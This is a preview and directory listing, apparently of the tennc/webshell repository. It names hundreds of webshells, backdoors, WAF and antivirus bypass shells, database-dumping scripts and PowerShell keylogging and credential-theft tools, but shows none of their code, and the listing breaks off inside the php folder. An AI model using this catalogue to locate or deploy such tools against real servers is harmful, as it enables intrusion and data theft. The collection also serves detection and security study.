Copy disabled (too large)
Download .txt
Showing preview only (71,973K chars total). Download the full file to get everything.
Repository: tennc/webshell
Branch: master
Commit: 6b17eae4a0bc
Files: 1638
Total size: 68.4 MB
Directory structure:
gitextract_dl1ys0kh/
├── .github/
│ └── FUNDING.yml
├── .gitmodules
├── 0xAbbarhSF/
│ └── CTF-WebShells-/
│ └── README.md
├── 138shell/
│ ├── A/
│ │ ├── Ajan.asp.txt
│ │ ├── Ajax_PHP Command Shell.txt
│ │ ├── Antichat Shell v1.3.txt
│ │ ├── Asmodeus v0.1.pl.txt
│ │ ├── Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt
│ │ ├── aZRaiLPhp v1.0.txt
│ │ └── accept_language.txt
│ ├── B/
│ │ ├── Blind Shell.cpp.txt
│ │ ├── backdoor1.txt
│ │ ├── backdoorfr.txt
│ │ ├── backup.php.txt
│ │ ├── backupsql.php.txt
│ │ └── backupsql.txt
│ ├── C/
│ │ ├── CMD.asp.txt
│ │ ├── Casus15.php.txt
│ │ ├── CmdAsp.asp.txt
│ │ ├── Crystal.txt
│ │ ├── CyberSpy5.Asp.txt
│ │ ├── c100.txt
│ │ ├── c2007.php.txt
│ │ ├── c99(1).php.txt
│ │ ├── c99.txt
│ │ ├── cgi-python.py.txt
│ │ ├── connectback2.pl.txt
│ │ ├── ctt_sh.php.txt
│ │ ├── ctt_sh.txt
│ │ ├── cybershell.php.txt
│ │ └── cybershell.txt
│ ├── D/
│ │ ├── DTool Pro.txt
│ │ ├── Dive Shell 1.0 - Emperor Hacking Team.txt
│ │ ├── Dx.php.txt
│ │ ├── Dx.txt
│ │ ├── DxShell_hk.php.txt
│ │ └── dC3 Security Crew Shell PRiV.txt
│ ├── E/
│ │ ├── EFSO_2.asp.txt
│ │ ├── Elmali Seker.asp.txt
│ │ └── elmaliseker.asp.txt
│ ├── F/
│ │ ├── Fatalshell.php.txt
│ │ └── fuckphpshell.txt
│ ├── G/
│ │ ├── GFS web-shell ver 3.1.7 - PRiV8.txt
│ │ ├── gfs_sh.php.txt
│ │ └── gfs_sh.txt
│ ├── H/
│ │ └── h4ntu shell [powered by tsoi].txt
│ ├── I/
│ │ ├── Inderxer.asp.txt
│ │ ├── iMHaPFtp.php.txt
│ │ ├── iMHaPFtp.txt
│ │ ├── img.php.txt
│ │ ├── indexer.asp.txt
│ │ └── ironshell.txt
│ ├── J/
│ │ ├── Java Shell.js.txt
│ │ └── JspWebshell 1.2.txt
│ ├── K/
│ │ ├── KAdot Universal Shell v0.1.6.html.txt
│ │ └── Klasvayv.asp.txt
│ ├── L/
│ │ ├── Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt
│ │ ├── lamashell.txt
│ │ ├── load_shell.php.txt
│ │ ├── load_shell.txt
│ │ └── lurm_safemod_on.cgi.txt
│ ├── M/
│ │ ├── Moroccan Spamers Ma-EditioN By GhOsT.txt
│ │ ├── MySQL Web Interface Version 0.8.txt
│ │ ├── Mysql interface v1.0.txt
│ │ ├── mailer3.php.txt
│ │ ├── matamu.txt
│ │ ├── myshell.php.txt
│ │ ├── mysql.php.txt
│ │ ├── mysql_shell.txt
│ │ └── mysql_tool.php.txt
│ ├── N/
│ │ ├── NCC-Shell.txt
│ │ ├── NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt
│ │ ├── NT Addy.asp.txt
│ │ ├── NetworkFileManagerPHP.txt
│ │ ├── Nshell (1).php.txt
│ │ ├── network.php.txt
│ │ ├── nshell.php.txt
│ │ ├── nstview.php.txt
│ │ └── ntdaddy.asp.txt
│ ├── P/
│ │ ├── PH Vayv.php.txt
│ │ ├── PHANTASMA.txt
│ │ ├── PHP Backdoor Connect.pl.txt
│ │ ├── PHP Shell.php.txt
│ │ ├── PHPRemoteView.txt
│ │ ├── Phyton Shell.py.txt
│ │ ├── Private-i3lue.txt
│ │ ├── pHpINJ.php.txt
│ │ ├── perlbot.pl.txt
│ │ ├── php-backdoor.txt
│ │ ├── php-include-w-shell.txt
│ │ ├── phpbackdoor15.txt
│ │ ├── phpjackal.txt
│ │ ├── phpshell17.txt
│ │ ├── phvayv.php.txt
│ │ ├── pws.php.txt
│ │ ├── pws.txt
│ │ └── ru24_post_sh.txt
│ ├── R/
│ │ ├── Rader.asp.txt
│ │ ├── Rem Exp.asp.txt
│ │ ├── Rem View.php.txt
│ │ ├── Russian.php.txt
│ │ ├── r57 Shell.php.txt
│ │ ├── r57.php.txt
│ │ ├── r577.php.txt
│ │ ├── rootshell.txt
│ │ └── ru24_post_sh.php.txt
│ ├── README.md
│ ├── S/
│ │ ├── Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt
│ │ ├── Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt
│ │ ├── Server Variables.asp.txt
│ │ ├── SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.txt
│ │ ├── SimShell 1.0 - Simorgh Security MGZ.txt
│ │ ├── Sincap.php.txt
│ │ ├── SnIpEr_SA Shell.txt
│ │ ├── s.php.txt
│ │ ├── s72 Shell v1.1 Coding.txt
│ │ ├── shell.php.txt
│ │ ├── shellbot.pl.txt
│ │ ├── simple-backdoor.txt
│ │ ├── simple_cmd.txt
│ │ ├── smtpd.py.txt
│ │ ├── spy.php.txt
│ │ └── sql.php.txt
│ ├── T/
│ │ ├── Test.php.txt
│ │ ├── Tool.asp.txt
│ │ ├── telnet.cgi.txt
│ │ ├── telnet.pl.txt
│ │ └── telnetd.pl.txt
│ ├── U/
│ │ └── Uploader.php.txt
│ ├── W/
│ │ ├── WebShell.cgi.txt
│ │ ├── WinX Shell.txt
│ │ ├── Worse Linux Shell.txt
│ │ ├── w.php.txt
│ │ ├── w3d.php.txt
│ │ ├── w4k.php.txt
│ │ ├── wacking.php.txt
│ │ └── webshell.txt
│ ├── X/
│ │ └── xinfo.php.txt
│ └── Z/
│ ├── Zehir 4.asp.txt
│ ├── zacosmall.php.txt
│ ├── zacosmall.txt
│ └── zehir4.asp.txt
├── Backdoor Dev Shells/
│ ├── Source/
│ │ ├── devilzShell.asp
│ │ ├── devilzShell.aspx
│ │ ├── devilzShell.cgi
│ │ ├── devilzShell.jsp
│ │ └── devilzShell.php
│ ├── devshell.asp
│ ├── devshell.aspx
│ ├── devshell.cfm
│ ├── devshell.cgi
│ ├── devshell.jsp
│ ├── devshell.php
│ └── readme.md
├── Behinder/
│ ├── readme.md
│ ├── shell-2021-03-18.php
│ ├── shell-2021-04-23.php
│ ├── shell.asp
│ ├── shell.aspx
│ ├── shell.jsp
│ ├── shell.php
│ ├── shell2020-12-06.php
│ └── 简单的冰蝎流量魔改.md
├── Godzilla/
│ ├── 123.ashx
│ ├── 123.asmx
│ ├── 123.aspx
│ ├── 123.jsp
│ ├── 123.jspx
│ ├── 123.php
│ ├── 20220213.php
│ ├── 20220213_02.php
│ ├── 20220213_03.php
│ └── Godzilla-BypassOpenRasp.jar
├── LICENSE
├── README.md
├── README_EN.md
├── README_TR.md
├── SECURITY.md
├── _config.yml
├── antSword/
│ └── mybase.md
├── antSword-shells/
│ ├── README.md
│ ├── WebLogic_Shiro.md
│ ├── jsp_custom_script_for_oracle.jsp
│ ├── jsp_custom_spy_for_mysql.jsp
│ ├── jspx_custom_script_for_mysql.jspx
│ ├── php1.php
│ ├── php2.php
│ ├── php3.php
│ ├── php_assert.php
│ ├── php_create_function.php
│ ├── php_custom_script_for_mysql_fix.php
│ ├── php_custom_spy_for_mysql.php
│ └── python2_custom_script.py
├── asp/
│ ├── 08小组内部交流专用.asp.txt
│ ├── 1d.asp
│ ├── 2013110125027897.asp
│ ├── 2022-08-12.aspx.txt
│ ├── 404.asp
│ ├── 80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一asp.txt
│ ├── ASPXspy2.aspx
│ ├── ASP一句话.txt
│ ├── ASP一句话02.txt
│ ├── Ajan.asp
│ ├── Asp最新变形一句话.asp
│ ├── Asp最新变形一句话2014-11-21.asp.md
│ ├── Cmd支持管理员登陆的webshell.asp
│ ├── CyberSpy5.Asp
│ ├── DarkBlade1.5.asp
│ ├── EFSO_2.asp
│ ├── Expdoor.com ASP专用小马.asp
│ ├── Inderxer.asp
│ ├── RadHat-webshell-del-backdoor/
│ │ ├── 加密版.asp
│ │ └── 明文版.asp
│ ├── Rader.asp
│ ├── RemExp.asp
│ ├── Server Variables.asp
│ ├── ajn.asp
│ ├── ajs/
│ │ ├── readme.md
│ │ ├── shell.asp
│ │ └── shell_decoded.asp
│ ├── aspydrv.asp.txt
│ ├── base.asp
│ ├── bypass-all.asp
│ ├── bypass-iisuser-p.asp
│ ├── bypass-waf.asp
│ ├── bypass_safedog_01.asp
│ ├── bypass_safedog_02.asp
│ ├── bypass_safedog_03.asp
│ ├── class-initialize.asp
│ ├── class-terminate.asp
│ ├── cmd.asp.txt
│ ├── cmd提权马.asp
│ ├── con2.asp
│ ├── cpanel.asp
│ ├── create-activex-object.asp
│ ├── execute-session.asp
│ ├── glorysday.asp
│ ├── good_1.asp
│ ├── grasp.asp
│ ├── hididi.net.txt
│ ├── ice.asp
│ ├── killdoor.txt
│ ├── klasvayv.asp
│ ├── lpl38-com-RedHat/
│ │ ├── radhat.asp
│ │ ├── readme.txt
│ │ └── 解包unpack.vbs
│ ├── lpl38-com-redhat.asp.txt
│ ├── luoss.asp.txt
│ ├── mumaasp.com.asp
│ ├── nonoseed0121.asp.txt
│ ├── r00ts无FSO组建大马.asp
│ ├── shell.asp
│ ├── test.asp.txt
│ ├── use-html-annotator-bypass.asp
│ ├── utf7-bypass.asp
│ ├── vbencode-bypass.asp
│ ├── vps提权马.asp
│ ├── webshell.asp
│ ├── xslt.asp
│ ├── xx.asp
│ ├── 不带引号的Asp一句话.asp
│ ├── 不灭之魂.asp
│ └── 传说中的hcker.asp.txt
├── aspx/
│ ├── .NET WebShell 免杀系列之Unicode编码.md
│ ├── 111.aspx
│ ├── 2013110125222650.aspx
│ ├── ASPXspy2.aspx
│ ├── ASPX一句话
│ ├── ASPX一句话02.txt
│ ├── AspxSpy2014Final.aspx
│ ├── Aspx一句话木马小集.aspx
│ ├── Nightrunner.aspx%20.txt
│ ├── a.aspx
│ ├── a1.aspx
│ ├── a3.aspx
│ ├── abcd.aspx
│ ├── as.ashx
│ ├── asp.net-backdoors/
│ │ ├── ChangeLog.txt
│ │ ├── cmdexec.aspx
│ │ ├── filesystembrowser.aspx
│ │ ├── fileupload.aspx
│ │ ├── spexec.aspx
│ │ └── sql.aspx
│ ├── aspx下嗅探工具websniff1.0-linux.aspx
│ ├── aspx变形一句话.aspx
│ ├── con2.aspx
│ ├── editor.aspx
│ ├── httpHandlers_backdoor/
│ │ ├── Customize.cs
│ │ ├── global.asax
│ │ ├── httpHandlers.md
│ │ ├── httpModules.md
│ │ └── readme.md
│ ├── icesword.aspx
│ ├── lpl38-com-aspx.txt
│ ├── nishang/
│ │ ├── .gitattributes
│ │ ├── .gitignore
│ │ ├── Antak-WebShell/
│ │ │ ├── Readme.md
│ │ │ └── antak.aspx
│ │ ├── Backdoors/
│ │ │ ├── DNS_TXT_Pwnage.ps1
│ │ │ ├── Execute-OnTime.ps1
│ │ │ └── HTTP-Backdoor.ps1
│ │ ├── CHANGELOG.txt
│ │ ├── Escalation/
│ │ │ ├── Enable-DuplicateToken.ps1
│ │ │ └── Remove-Update.ps1
│ │ ├── Execution/
│ │ │ ├── Download-Execute-PS.ps1
│ │ │ ├── Download_Execute.ps1
│ │ │ ├── Execute-Command-MSSQL.ps1
│ │ │ └── Execute-DNSTXT-Code.ps1
│ │ ├── Gather/
│ │ │ ├── Check-VM.ps1
│ │ │ ├── Copy-VSS.ps1
│ │ │ ├── Credentials.ps1
│ │ │ ├── FireBuster.ps1
│ │ │ ├── FireListener.ps1
│ │ │ ├── Get-Information.ps1
│ │ │ ├── Get-LSASecret.ps1
│ │ │ ├── Get-PassHashes.ps1
│ │ │ ├── Get-WLAN-Keys.ps1
│ │ │ └── Keylogger.ps1
│ │ ├── Misc/
│ │ │ └── Speak.ps1
│ │ ├── Pivot/
│ │ │ ├── Create-MultipleSessions.ps1
│ │ │ └── Run-EXEonRemote.ps1
│ │ ├── Prasadhak/
│ │ │ └── Prasadhak.ps1
│ │ ├── README.md
│ │ ├── Scan/
│ │ │ ├── Brute-Force.ps1
│ │ │ └── Port-Scan.ps1
│ │ ├── Utility/
│ │ │ ├── Add-Exfiltration.ps1
│ │ │ ├── Add-Persistence.ps1
│ │ │ ├── Base64ToString.ps1
│ │ │ ├── Do-Exfiltration.ps1
│ │ │ ├── Download.ps1
│ │ │ ├── ExetoText.ps1
│ │ │ ├── Invoke-Decode.ps1
│ │ │ ├── Invoke-Encode.ps1
│ │ │ ├── Parse_Keys.ps1
│ │ │ ├── Remove-Persistence.ps1
│ │ │ ├── StringToBase64.ps1
│ │ │ └── TexttoExe.ps1
│ │ ├── nishang.psm1
│ │ └── powerpreter/
│ │ ├── Powerpreter.psm1
│ │ └── README.md
│ ├── web.config
│ ├── wooyun2015052301.aspx
│ ├── wso.aspx
│ ├── xslt.aspx
│ └── z1(1).txt
├── b4tm4n-toolz/
│ ├── README.md
│ ├── backconnect/
│ │ ├── back.h
│ │ ├── back.java
│ │ ├── back.js
│ │ ├── back.php
│ │ ├── back.pl
│ │ ├── back.py
│ │ ├── back.rb
│ │ └── list.json
│ └── database/
│ ├── adminer-4.5.0.php
│ └── list.json
├── bt_yincang_shell.md
├── bypass.md
├── caidao-shell/
│ ├── 3802.php
│ ├── 404.php
│ ├── Customize.soap
│ ├── README.md
│ ├── a.asp
│ ├── bypass01.php
│ ├── caidao-plug/
│ │ ├── ASP读终端端口.ccc
│ │ ├── Aspx文件搜索.ccc
│ │ ├── Aspx设置权限.ccc
│ │ ├── PHP批量挂马.ccc
│ │ ├── README.md
│ │ ├── asp目录写权限检测.ccc
│ │ ├── php_HTTP代理.ccc
│ │ ├── phpspy2011.ccc
│ │ ├── php端口转向.ccc
│ │ └── 扫描端口_php.ccc
│ ├── customize.ashx
│ ├── customize.asmx
│ ├── cutstomize.asp
│ ├── download 下载文件.asp
│ ├── fuck.php
│ ├── guest.jsp
│ ├── guo.php
│ ├── hkmjj.asp
│ ├── ice.asp
│ ├── ice.aspx
│ ├── ice.cfm
│ ├── ice.jsp
│ ├── ice.php
│ ├── m7lrv01.php
│ ├── mdb.asp
│ ├── p.php
│ ├── qun01.php
│ ├── redirect.asp
│ ├── short_shell.md
│ ├── sqzr.php
│ ├── tie01.asp
│ ├── toby57解析加密一句话木马.php
│ ├── w-ob_start01.php
│ ├── w-ob_start02.php
│ ├── w.jsp
│ ├── w.jspx
│ ├── w.php
│ ├── w01.asp
│ ├── w01.php
│ ├── w02.asp
│ ├── w02.jsp
│ ├── w02.php
│ ├── w03.asp
│ ├── w03.jsp
│ ├── w_2016-05-25.php
│ ├── x.php
│ ├── z-2016-01-05.php
│ ├── 强悍.php
│ ├── 菜刀jsp修改.jsp
│ └── 说明.log
├── content/
│ ├── Webshell免杀的思考与学习 - 先知社区.mhtml
│ ├── readme.md
│ └── webshell-detect-bypass
├── cseroad/
│ ├── README.md
│ └── Webshell_Generate-1.1.jar
├── docs/
│ ├── README.md
│ ├── _config.yml
│ └── webshell.md
├── drag/
│ ├── MSSQL.asp
│ ├── README.md
│ ├── asp wget drag database.asp.txt
│ ├── jsp wget drag database.jsp.txt
│ ├── mysql_1.php
│ ├── mysql_jsp脱裤.txt
│ ├── mysql数据库脱单个表.jsp
│ ├── oracle_jsp脱裤.txt
│ ├── oracle脱裤脚本.jsp
│ ├── php wget drag database.php 2.txt
│ ├── php wget drag database.php.txt
│ ├── system.jsp
│ ├── tuo.aspx
│ └── 脱mysql数据库.jsp
├── fuzzdb-webshell/
│ ├── README.md
│ ├── asp/
│ │ ├── cmd-asp-5.1.asp
│ │ ├── cmd.asp
│ │ ├── cmd.aspx
│ │ ├── cmdasp.asp
│ │ ├── cmdasp.aspx
│ │ ├── list.asp
│ │ ├── list.txt
│ │ ├── ntdaddy.asp
│ │ └── up.asp
│ ├── c/
│ │ └── cmd.c
│ ├── cfm/
│ │ ├── cfExec.cfm
│ │ ├── cfSQL.cfm
│ │ └── cmd.cfm
│ ├── jsp/
│ │ ├── CmdServlet.java
│ │ ├── ListServlet.java
│ │ ├── UpServlet.java
│ │ ├── browser.jsp
│ │ ├── cmd.jsp
│ │ ├── cmdjsp.jsp
│ │ ├── jsp-reverse.jsp
│ │ ├── list.jsp
│ │ ├── up.jsp
│ │ └── win32/
│ │ ├── cmd_win32.jsp
│ │ └── up_win32.jsp
│ ├── php/
│ │ ├── cmd.php
│ │ ├── list.php
│ │ ├── php-backdoor.php
│ │ ├── simple-backdoor.php
│ │ └── up.php
│ ├── pl-cgi/
│ │ ├── cmd.pl
│ │ ├── list.pl
│ │ ├── perlcmd.cgi
│ │ └── up.pl
│ ├── servlet/
│ │ ├── CmdServlet.java
│ │ ├── ListServlet.java
│ │ └── UpServlet.java
│ └── sh/
│ ├── cmd.sh
│ ├── list.sh
│ └── up.sh
├── java/
│ └── 字节码增强型/
│ └── retransform字节码.md
├── jsp/
│ ├── 000.jsp
│ ├── 0000.jsp
│ ├── 1.jsp
│ ├── 102.jsp
│ ├── 123.jsp
│ ├── 12302.jsp
│ ├── 2.jsp
│ ├── 201.jsp
│ ├── 2021052101.jsp
│ ├── 2022-09-03-01.jsp
│ ├── 2022-09-03-02.jsp
│ ├── 2022-09-03-03.jsp
│ ├── 3.jsp
│ ├── 400.jsp
│ ├── 403.jsp
│ ├── 404.jsp
│ ├── 520.jsp
│ ├── 807.jsp
│ ├── CaiDao-Webshell-Password-LandGrey.jsp
│ ├── Chropper for jsp/
│ │ ├── Chropper.java
│ │ ├── 菜刀jsp脚本文明版.jsp
│ │ ├── 菜刀jsp脚本无压缩版.jsp
│ │ ├── 菜刀jsp脚本更新版.jsp
│ │ └── 菜刀脚本连接数据库问题.txt
│ ├── IXRbE.jsp
│ ├── IXRbE02.jsp
│ ├── JFolder.jsp
│ ├── JSP一句话
│ ├── JSP菜刀一句话木马.jsp
│ ├── Java Shell.jsp
│ ├── JspSpy.jsp
│ ├── JspSpy1.jsp
│ ├── JspSpyJDK5.jsp
│ ├── JspSpyJDK51.jsp
│ ├── JspWebshell 1.2.jsp
│ ├── ProcessBuilder-cmd.jsp
│ ├── ProcessBuilder-reflect-cmd.jsp
│ ├── ROOTtows.jsp
│ ├── Runtime-reflect-cmd.jsp
│ ├── SJavaWebManageV1.4.jsp
│ ├── Silic.jsp
│ ├── WebSocket 内存马,一种新型内存马技术.md
│ ├── a.jsp
│ ├── action.jsp
│ ├── asd.jsp
│ ├── c5.jsp
│ ├── cat/
│ │ ├── Cat.java
│ │ ├── cat.jar
│ │ ├── cat.jsp
│ │ ├── catjsp.md
│ │ ├── cmd1.jsp
│ │ ├── cmd2.jsp
│ │ ├── readme.md
│ │ └── test.php
│ ├── cmdjsp.jsp
│ ├── cofigrue.jsp
│ ├── config.jsp
│ ├── css.jsp
│ ├── customize.jsp
│ ├── data.jsp
│ ├── data02.jsp
│ ├── date.jsp.txt
│ ├── dm.jsp
│ ├── dy.jsp
│ ├── edit_ot.jsp
│ ├── guige.jsp
│ ├── guige02.jsp
│ ├── ha.jsp
│ ├── hackk8/
│ │ ├── JSP/
│ │ │ ├── Customize.jsp
│ │ │ ├── Java Shell.jsp
│ │ │ ├── JspWebshell 1.2.jsp
│ │ │ ├── cmdjsp.jsp
│ │ │ ├── jsp-reverse.jsp
│ │ │ ├── jspspy有屏幕.txt
│ │ │ ├── minupload.jsp
│ │ │ └── other/
│ │ │ ├── download.jsp
│ │ │ ├── jspspy.jsp
│ │ │ ├── jspspy_k8.jsp
│ │ │ └── thx.jsp
│ │ ├── JSP_66/
│ │ │ ├── Customize.jsp
│ │ │ ├── Java Shell.jsp
│ │ │ ├── JspWebshell 1.2.jsp
│ │ │ ├── cmdjsp.jsp
│ │ │ ├── jsp-reverse.jsp
│ │ │ ├── minupload.jsp
│ │ │ └── other/
│ │ │ ├── download.jsp
│ │ │ ├── jspspy.jsp
│ │ │ ├── jspspy_k8.jsp
│ │ │ └── thx.jsp
│ │ ├── Struts2下shell兼容性报告_K8.txt
│ │ ├── fuck-jsp/
│ │ │ ├── JFolder.jsp
│ │ │ ├── JspSpyJDK5.jsp
│ │ │ ├── in.jsp
│ │ │ ├── job.jsp
│ │ │ ├── jspbrowser/
│ │ │ │ ├── 1.jsp
│ │ │ │ ├── 2.jsp
│ │ │ │ ├── Browser.jsp
│ │ │ │ ├── Readme.txt
│ │ │ │ ├── example-css.css
│ │ │ │ └── gpl.txt
│ │ │ ├── ma1.jsp
│ │ │ ├── ma2.jsp
│ │ │ ├── ma3.jsp
│ │ │ ├── ma4.jsp
│ │ │ ├── no.jsp
│ │ │ ├── silic webshell.jsp
│ │ │ └── spjspshell.jsp
│ │ ├── jsp2/
│ │ │ ├── CmdServlet.java
│ │ │ ├── ListServlet.java
│ │ │ ├── UpServlet.java
│ │ │ ├── browser.jsp
│ │ │ ├── cmd.jsp
│ │ │ ├── cmdjsp.jsp
│ │ │ ├── jsp-reverse.jsp
│ │ │ ├── list.jsp
│ │ │ ├── up.jsp
│ │ │ └── win32/
│ │ │ ├── cmd_win32.jsp
│ │ │ └── up_win32.jsp
│ │ └── jsp_77/
│ │ ├── CmdServlet.java
│ │ ├── ListServlet.java
│ │ ├── UpServlet.java
│ │ ├── browser.jsp
│ │ ├── cmd.jsp
│ │ ├── cmdjsp.jsp
│ │ ├── jsp-reverse.jsp
│ │ ├── list.jsp
│ │ ├── up.jsp
│ │ └── win32/
│ │ ├── cmd_win32.jsp
│ │ └── up_win32.jsp
│ ├── he1p.jsp
│ ├── hideShell.jsp
│ ├── hsxa.jsp
│ ├── hsxa1.jsp
│ ├── icesword.jsp
│ ├── in.jsp
│ ├── inback3.jsp
│ ├── index_bak1.jsp
│ ├── index_sys.jsp
│ ├── indexop.jsp.上传.jsp
│ ├── info.jsp
│ ├── java/
│ │ ├── java_faces_shell.xhtml
│ │ └── readme.md
│ ├── jdbc.jsp
│ ├── jfolder01.jsp
│ ├── job.jsp
│ ├── jshell.jsp
│ ├── jsp-reverse.jsp
│ ├── jsp.jsp
│ ├── jsp.txt
│ ├── jsp_File_browser.jsp
│ ├── jspbrowser/
│ │ ├── 1.jsp
│ │ ├── 2.jsp
│ │ ├── Browser.jsp
│ │ ├── Readme.txt
│ │ ├── example-css.css
│ │ └── gpl.txt
│ ├── jspspy/
│ │ ├── JspSpy.jsp
│ │ ├── JspSpy1.jsp
│ │ ├── JspSpyJDK5.jsp
│ │ ├── JspSpyJDK51.jsp
│ │ ├── Jspspyweb.jsp
│ │ └── 使用说明.txt
│ ├── jweevely.md
│ ├── k81.jsp
│ ├── k8cmd.jsp
│ ├── ks0ljvi9m2.txt
│ ├── leo.jsp
│ ├── list1.jsp
│ ├── luci.jsp.spy2009.jsp
│ ├── m.jsp
│ ├── ma (1).jsp
│ ├── ma.jsp
│ ├── ma1.jsp
│ ├── ma2.jsp
│ ├── ma3.jsp
│ ├── ma4.jsp
│ ├── maint.jsp
│ ├── mg.jsp
│ ├── mmym520.jsp
│ ├── myxx.jsp
│ ├── myxx1.jsp
│ ├── netspy/
│ │ ├── netspy.jsp
│ │ └── readme.md
│ ├── no.jsp
│ ├── nogfw.jsp
│ ├── ok.jsp
│ ├── one8.jsp
│ ├── p2j.cn/
│ │ ├── jshell.jsp
│ │ └── readme.md
│ ├── pb.jsp
│ ├── pyth.jsp
│ ├── queryDong.jsp
│ ├── shell.jsp
│ ├── shell1.jsp
│ ├── silic webshell.jsp
│ ├── spjspshell.jsp
│ ├── spyjsp2010.jsp
│ ├── struts2/
│ │ ├── dict.txt
│ │ └── webshell.txt
│ ├── style.jsp
│ ├── suiyue.jsp
│ ├── sys3.jsp
│ ├── system1.jsp.上传.jsp
│ ├── t.jsp
│ ├── t00ls.jsp
│ ├── t00ls1.jsp
│ ├── test.jsp
│ ├── tree.jsp
│ ├── u.jsp
│ ├── utils.jsp
│ ├── ver007.jsp
│ ├── ver008.jsp
│ ├── warn.jsp
│ ├── web.jsp
│ ├── web02.jsp
│ ├── webshell-nc.jsp
│ ├── x.jsp
│ ├── x7.jsp
│ ├── xia.jsp
│ ├── xm.jsp
│ ├── xx.jsp
│ ├── yijuhua.jsp
│ ├── zend.jsp
│ ├── zval.jsp
│ ├── zx.jsp
│ └── 新型JSP小马支持上传任意格式文件.jsp
├── jspx/
│ ├── Ends/
│ │ ├── Readme.md
│ │ └── base64.jspx.txt
│ ├── cmd.jspx
│ ├── jjw.jspx
│ ├── jspspy.jspx
│ ├── jspx.jspx
│ ├── jsp一句话.txt
│ ├── jw.jspx
│ └── paxmac.jspx
├── msmap/
│ └── README.md
├── net-friend/
│ ├── ChatRoom/
│ │ ├── 菊花聊天室.asp
│ │ └── 菊花聊天室.php
│ ├── asp/
│ │ ├── 01.asp
│ │ ├── 1.asp
│ │ ├── DarkBlade1.3--强大的asp大马/
│ │ │ └── indexx.asp
│ │ ├── asp目录可写扫描/
│ │ │ ├── 01.aspx
│ │ │ ├── 1.aspx
│ │ │ ├── finaly.aspx
│ │ │ ├── wt.asp
│ │ │ └── wt.aspx
│ │ ├── mssql在线管理.asp
│ │ ├── 一句话.doc
│ │ ├── 修改属性.asp
│ │ └── 陆羽asp打包/
│ │ ├── 1.bat
│ │ ├── dabao.asp
│ │ └── unpack.vbs
│ ├── aspx/
│ │ ├── 01.aspx
│ │ ├── 1----环境检测功能非常不错.aspx
│ │ ├── 1.aspx
│ │ ├── 11.aspx
│ │ ├── ASP.NET Web BackDoor.aspx
│ │ ├── Aspx(免杀).aspx
│ │ ├── aspx.aspx
│ │ ├── aspxspy/
│ │ │ ├── 1.aspx
│ │ │ ├── aspxspy.aspx
│ │ │ └── read.txt
│ │ ├── aspxspy.aspx
│ │ ├── read.txt
│ │ ├── sniffer--aspx的嗅探工具.aspx
│ │ ├── view.aspx
│ │ ├── 干净清爽的大马,不怎么好用.aspx
│ │ └── 脱裤4ngle.aspx
│ ├── cfm/
│ │ ├── ColdFusion.chm
│ │ ├── cfmShell.cfm
│ │ ├── cmfshell.cmf
│ │ ├── list.cfm
│ │ ├── mycode12.cfm
│ │ └── xl.cfm
│ ├── cgi/
│ │ └── WebShell.cgi
│ ├── jsp/
│ │ ├── JFolder.jsp
│ │ ├── JspSpyJDK5.jsp
│ │ ├── in.jsp
│ │ ├── job.jsp
│ │ ├── jspbrowser/
│ │ │ ├── 1.jsp
│ │ │ ├── 2.jsp
│ │ │ ├── Browser.jsp
│ │ │ ├── Readme.txt
│ │ │ ├── example-css.css
│ │ │ └── gpl.txt
│ │ ├── ma1.jsp
│ │ ├── ma2.jsp
│ │ ├── ma3.jsp
│ │ ├── ma4.jsp
│ │ ├── no.jsp
│ │ ├── silic webshell.jsp
│ │ └── spjspshell.jsp
│ ├── php/
│ │ ├── 2.php
│ │ ├── moon.php
│ │ ├── php一句话后门.TXT
│ │ ├── php网站打包(dodo)/
│ │ │ ├── php网站打包(dodo).doc
│ │ │ └── zip.php
│ │ ├── php读取iis.txt
│ │ ├── s-u.php
│ │ └── 零魂PHP一句话木马客户端%28一键提交版%29/
│ │ └── 零魂PHP一句话木马客户端(一键提交版)/
│ │ ├── Readme.txt
│ │ └── 零魂PHP一句话木马客户端.htm
│ ├── war/
│ │ └── test3693.war
│ └── 可读写目录探测/
│ ├── PHP 搜索可读可写目录脚本.php
│ ├── 从注册表中读存在路径.aspx
│ ├── 啊D小工具 - 目录读写检测 [ASPX版].aspx
│ ├── 啊D小工具 - 目录读写检测 [ASP版].asp
│ ├── 啊D小工具 - 目录读写检测 [ASP版]说明.txt
│ └── 很好用的扫可读可写目录asp脚本xwdir.asp
├── nodejs/
│ └── shell.js
├── other/
│ ├── Axis2Shell/
│ │ ├── README.md
│ │ ├── Utils.java
│ │ └── config.aar
│ ├── README.md
│ ├── acat/
│ │ ├── ACat-附数据库驱动-jdk1.5.jar
│ │ ├── ACat-附数据库驱动.jar
│ │ ├── ACat.jar
│ │ ├── ACat_jdk1.5.jar
│ │ └── readme.md
│ ├── bypass_waf.txt
│ ├── cat.aar/
│ │ └── Readme.md
│ ├── icesword.war
│ ├── jdk1.3webshell/
│ │ ├── readme.MD
│ │ ├── test.ear
│ │ └── test.war
│ ├── ololo.cfm
│ ├── pwd.txt
│ ├── small_shell.txt
│ ├── webshell-pwd.txt
│ └── zs.war
├── other shell repository.md
├── php/
│ ├── 12309/
│ │ ├── 12309.php.txt
│ │ └── readme.md
│ ├── 2011.php
│ ├── 2020-08-31-01.php
│ ├── 2020.08.20.01.php
│ ├── 2020.08.20.02.php
│ ├── 2020.08.20.03.php
│ ├── 2020.08.20.04.php
│ ├── 2020.08.20.05.php
│ ├── 2020.08.20.06.php
│ ├── 2020.08.20.07.php
│ ├── 2020.08.20.08.php
│ ├── 2020.08.20.09.php
│ ├── 2020.08.20.10.php
│ ├── 2020.08.20.11.php
│ ├── 2020.08.20.12.php
│ ├── 2020.08.20.13.php
│ ├── 2020.08.20.14.php
│ ├── 2020.08.20.15.php
│ ├── 2020.08.20.16.php
│ ├── 2020.08.20.17.php
│ ├── 2020.08.20.18.php
│ ├── 2020.08.20.19.php
│ ├── 2020.08.20.20.php
│ ├── 2022-08-26-01.php
│ ├── 2022-08-26-02.php
│ ├── 2022-08-26-03.php
│ ├── 2022-08-26-04.php
│ ├── 2022-08-26-05.php
│ ├── 2022-08-26-06.php
│ ├── 2022-08-26-07.php
│ ├── 2022-08-26-08.php
│ ├── 2022-09-09-02.php
│ ├── 2022-09-09-03.php
│ ├── 2022-09-09-04.php
│ ├── 2022-09-09-05.php
